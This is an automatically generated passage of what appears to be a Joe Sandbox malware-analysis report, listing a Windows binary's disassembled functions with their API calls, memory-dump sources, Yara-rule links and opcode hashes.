MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00277868
SysAllocString.OLEAUT32(00000000), ref: 0027786B
SysAllocString.OLEAUT32 ref: 0027788C
SysFreeString.OLEAUT32 ref: 00277895
StringFromGUID2.OLE32(?,?,00000028), ref: 002778AF
SysAllocString.OLEAUT32(?), ref: 002778BD

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d04fbad5fce6fc09978f9bf3a808d87a45141671018d74d925612995d42b65fe
Instruction ID: 0127463a3219481e88ce657d375bdc5db2080b60476e7ab89a1476dbe9859dff
Opcode Fuzzy Hash: d04fbad5fce6fc09978f9bf3a808d87a45141671018d74d925612995d42b65fe
Instruction Fuzzy Hash: B7219D31619205AFDB10AFA8EC8CDBA77ECEB093607108125F919CB2A1DA70DC51DB65

Uniqueness

Uniqueness Score: -1.00%

Function 002804D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 002804F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0028052E

Strings

nul, xrefs: 00280567

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 3092796d825a06032e0fcf0038583961083a1dd765b6f91c1087b901ca2df14b
Instruction ID: 0323d507b6bb36837dab14ac5b01f4cf7a553812f1eb9345e0733316c2b50298
Opcode Fuzzy Hash: 3092796d825a06032e0fcf0038583961083a1dd765b6f91c1087b901ca2df14b
Instruction Fuzzy Hash: 0E21A5795113069FCB20AF29EC84A5A77E4BF45720F604A19F8A1D21E0D7749968CF30

Uniqueness

Uniqueness Score: -1.00%

Function 002805A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 002805C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00280601

Strings

nul, xrefs: 00280639

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: b555ba6996a7fb7a451d46ec0feb29eaec7d7696f2648b42ec1f96a70818e942
Instruction ID: 89aa3f1dc1e44795ac0b89f338f8cc527524b79a1a7e3b14285eeff93526eb68
Opcode Fuzzy Hash: b555ba6996a7fb7a451d46ec0feb29eaec7d7696f2648b42ec1f96a70818e942
Instruction Fuzzy Hash: DD21B7395113169FDB60AF68DC84A5A77E8BF85720F200B19FCA1D32D0EBB09874CB10

Uniqueness

Uniqueness Score: -1.00%

Function 002A40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0021600E: CreateWindowExW.USER32 ref: 0021604C
Part of subcall function 0021600E: GetStockObject.GDI32(00000011), ref: 00216060
Part of subcall function 0021600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0021606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002A4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002A411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002A412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002A4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002A4145

Strings

Msctls_Progress32, xrefs: 002A40E3

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 51ba8009c1f34cad59c3d6457efc44dd19cf0db3b0cc3abf152a8d4b3a8aec26
Instruction ID: 6d8702635ba75fd8d26e82f2de77d40b672d877f26ed0ff20a89703f79ade25c
Opcode Fuzzy Hash: 51ba8009c1f34cad59c3d6457efc44dd19cf0db3b0cc3abf152a8d4b3a8aec26
Instruction Fuzzy Hash: CA11B2B215021ABFEF119F64CC85EE77F9DEF09798F004111BA18A6150CAB2DC61DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0024D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 0024D7A3: _free.LIBCMT ref: 0024D7CC

_free.LIBCMT ref: 0024D82D

Part of subcall function 002429C8: HeapFree.KERNEL32(00000000,00000000), ref: 002429DE
Part of subcall function 002429C8: GetLastError.KERNEL32(00000000,?,0024D7D1,00000000,00000000,00000000,00000000,?,0024D7F8,00000000,00000007,00000000,?,0024DBF5,00000000,00000000), ref: 002429F0

_free.LIBCMT ref: 0024D838
_free.LIBCMT ref: 0024D843
_free.LIBCMT ref: 0024D897
_free.LIBCMT ref: 0024D8A2
_free.LIBCMT ref: 0024D8AD
_free.LIBCMT ref: 0024D8B8

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction ID: 8fc96857f7ecb59ef4652d1aeaab4679ca90e73d920aec9bd5a62ee6181de18f
Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction Fuzzy Hash: 6D115171560B04EBE925BFB1CC47FCBBBDC6F00700F800825B299A6192DA75B5254E50

Uniqueness

Uniqueness Score: -1.00%

Function 0028096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(008EA3A0,008EA3A0), ref: 0028097B
EnterCriticalSection.KERNEL32(008EA380,00000000), ref: 0028098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 0028099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 002809A9
CloseHandle.KERNEL32(00000000), ref: 002809B8
InterlockedExchange.KERNEL32(008EA3A0,000001F6), ref: 002809C8
LeaveCriticalSection.KERNEL32(008EA380), ref: 002809CF

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: e83b34eb3a7dd42124b94ed260005c7cd082d2ff19987743640ed1163a383e8c
Instruction ID: 300b62fbd328095c5746105533add763bae24ad30333c593c0c32366d6e38aa0
Opcode Fuzzy Hash: e83b34eb3a7dd42124b94ed260005c7cd082d2ff19987743640ed1163a383e8c
Instruction Fuzzy Hash: 31F0C932542A12FBD7516FA4EE8DBD6BA29FF06702F502025F602908A1DF75A875CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002401B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 002400BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002400D6
__allrem.LIBCMT ref: 002400ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0024010B
__allrem.LIBCMT ref: 00240122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00240140

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 37cb75cf08a1997f6f9ec1bb4f9f56f0988deb3ae52fc467730a73c58462c78e
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 788149B2A207029BE728AF79DC81B6B73E8AF41724F24453AF915D76C1E770D9608F50

Uniqueness

Uniqueness Score: -1.00%

Function 0026F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0026F7B9
SysAllocString.OLEAUT32(00000001), ref: 0026F860
VariantCopy.OLEAUT32(0026FA64,00000000), ref: 0026F889
VariantClear.OLEAUT32(0026FA64), ref: 0026F8AD
VariantCopy.OLEAUT32(0026FA64,00000000), ref: 0026F8B1
VariantClear.OLEAUT32(?), ref: 0026F8BB

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 4c25a14339625fc8a3776c6f955e5b22b77465ff7aab6f91934d378854c065bb
Instruction ID: c0195f37c157b697d4a3954fc8fc8577827dbbcabbce01caa0b2b3353d8e7894
Opcode Fuzzy Hash: 4c25a14339625fc8a3776c6f955e5b22b77465ff7aab6f91934d378854c065bb
Instruction Fuzzy Hash: 3851D531631310BACF90AF65F995B29B3E8EF55310B208466E905DF291DBB08CE0CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0028910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00217620: _wcslen.LIBCMT ref: 00217625

Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 002894E5
_wcslen.LIBCMT ref: 00289506
_wcslen.LIBCMT ref: 0028952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00289585

Strings

X, xrefs: 00289412

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 884aaf4885795c6bbdd258e7a5fd80d3f00df07291ddd90186f81d9a3d2ce006
Instruction ID: 0c8904f7a558c382974330194a4b26483aed4276ee7537707d1b977ebaa1f0b3
Opcode Fuzzy Hash: 884aaf4885795c6bbdd258e7a5fd80d3f00df07291ddd90186f81d9a3d2ce006
Instruction Fuzzy Hash: C0E1D4345243419FD714EF24C881AAEB7E5BF94314F08856DF8899B2A2DB30DD95CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0022920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00229BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00229BB2

BeginPaint.USER32(?,?), ref: 00229241
GetWindowRect.USER32(?,?), ref: 002292A5
ScreenToClient.USER32(?,?), ref: 002292C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002292D3
EndPaint.USER32(?,?), ref: 00229321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002671EA

Part of subcall function 00229339: BeginPath.GDI32(00000000), ref: 00229357

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 605dfdbb2bf2a62b03a24fe0bc83080e1afa24cd31e8400c82b86f7f72ef3372
Instruction ID: 80de8c4991cd1908b7444c997b2cb0079139cc138246b5eb94f37807c408df54
Opcode Fuzzy Hash: 605dfdbb2bf2a62b03a24fe0bc83080e1afa24cd31e8400c82b86f7f72ef3372
Instruction Fuzzy Hash: D941B230114251EFD710DF64EC88FBA7BB8EF46724F140669F9548B2A2CB7098A5DB61

Uniqueness

Uniqueness Score: -1.00%

Function 002807EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0028080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00280847
EnterCriticalSection.KERNEL32(?), ref: 00280863
LeaveCriticalSection.KERNEL32(?), ref: 002808DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002808F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00280921

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 2a82a56d2db1f31bd556f21ad7a3be24d56147e29b96021baff93f580b84b309
Instruction ID: 79e137d1de25983374aba0755ca7f9396be9f161f3a296e629f038b37034281b
Opcode Fuzzy Hash: 2a82a56d2db1f31bd556f21ad7a3be24d56147e29b96021baff93f580b84b309
Instruction Fuzzy Hash: F8416A71A10205EBDF55AF94EC85AAA7778FF04310F1440B9ED04AA296DB30DE64DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 002A81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000), ref: 002A824C
EnableWindow.USER32(00000000,00000000), ref: 002A8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 002A82D1
ShowWindow.USER32(00000000,00000004), ref: 002A82E5
EnableWindow.USER32(00000000,00000001), ref: 002A830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 002A832F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: effbaa2786a66ca9d0af4d5ac865818f523c5323646266302febc098d82731aa
Instruction ID: 0b5b4f83a12260ee5d7413b87c02fe55f3fa8a45bd04670d35d155df472a6de4
Opcode Fuzzy Hash: effbaa2786a66ca9d0af4d5ac865818f523c5323646266302febc098d82731aa
Instruction Fuzzy Hash: 2F418334601685EFDF15CF15E899BB47BE0BB4B714F1841A9EA484F262CF31A865CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00274C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00274C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00274CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00274CEA
_wcslen.LIBCMT ref: 00274D08
CharUpperBuffW.USER32(00000000,00000000), ref: 00274D10
_wcsstr.LIBVCRUNTIME ref: 00274D1A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: e7933950b5113be365bb4b650e2d8e3c449071f3e1394fbe9a3601208a0c6775
Instruction ID: cf653dba2aba08c88dc99cd6d8bc24a4c26ae99f64ca6162fccfc5888b7d4496
Opcode Fuzzy Hash: e7933950b5113be365bb4b650e2d8e3c449071f3e1394fbe9a3601208a0c6775
Instruction Fuzzy Hash: 3C212C71214111BBEB2AAF79AD09E7B7BACDF46750F10807EF809CA151EF71DC1086A0

Uniqueness

Uniqueness Score: -1.00%

Function 0028581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00213AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00213A97,?,?,00212E7F,?,?,?,00000000), ref: 00213AC2

_wcslen.LIBCMT ref: 0028587B
CoInitialize.OLE32(00000000), ref: 00285995
CoCreateInstance.OLE32(002AFCF8,00000000,00000001,002AFB68,?), ref: 002859AE
CoUninitialize.OLE32 ref: 002859CC

Strings

.lnk, xrefs: 00285876, 002858C1, 00285985

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: f1cfc8b0290c51b56977da7a44bc662f0718915f843c775501c7a678587b67a3
Instruction ID: af003eeea7d1bbf661ce61bfe037d55c5d6896c5c864192faf5a1eb8c293761a
Opcode Fuzzy Hash: f1cfc8b0290c51b56977da7a44bc662f0718915f843c775501c7a678587b67a3
Instruction Fuzzy Hash: EBD174786286119FC714EF24C48096ABBF2FF99314F148859F8899B3A1DB31EC55CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0027175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00270FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00270FCA
Part of subcall function 00270FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00270FD6
Part of subcall function 00270FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00270FE5
Part of subcall function 00270FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00270FEC
Part of subcall function 00270FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00271002

GetLengthSid.ADVAPI32(?,00000000,00271335), ref: 002717AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002717BA
HeapAlloc.KERNEL32(00000000), ref: 002717C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 002717DA
GetProcessHeap.KERNEL32(00000000,00000000,00271335), ref: 002717EE
HeapFree.KERNEL32(00000000), ref: 002717F5

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: c60d8926649e8d9c52f179e17100328f92ed169e62632affbeca1fe67c89ee41
Instruction ID: aac7a351a7d099107727a74d96736c73e665a03d4dea845c0fafad4f6f4dd4d5
Opcode Fuzzy Hash: c60d8926649e8d9c52f179e17100328f92ed169e62632affbeca1fe67c89ee41
Instruction Fuzzy Hash: B9118171620205FFDB149FA8DC49BAEBBA9EF46355F208018F4499B110DB359964CB60

Uniqueness

Uniqueness Score: -1.00%

Function 002714CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002714FF
OpenProcessToken.ADVAPI32(00000000), ref: 00271506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00271515
CloseHandle.KERNEL32(00000004), ref: 00271520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0027154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00271563

Memory Dump Source

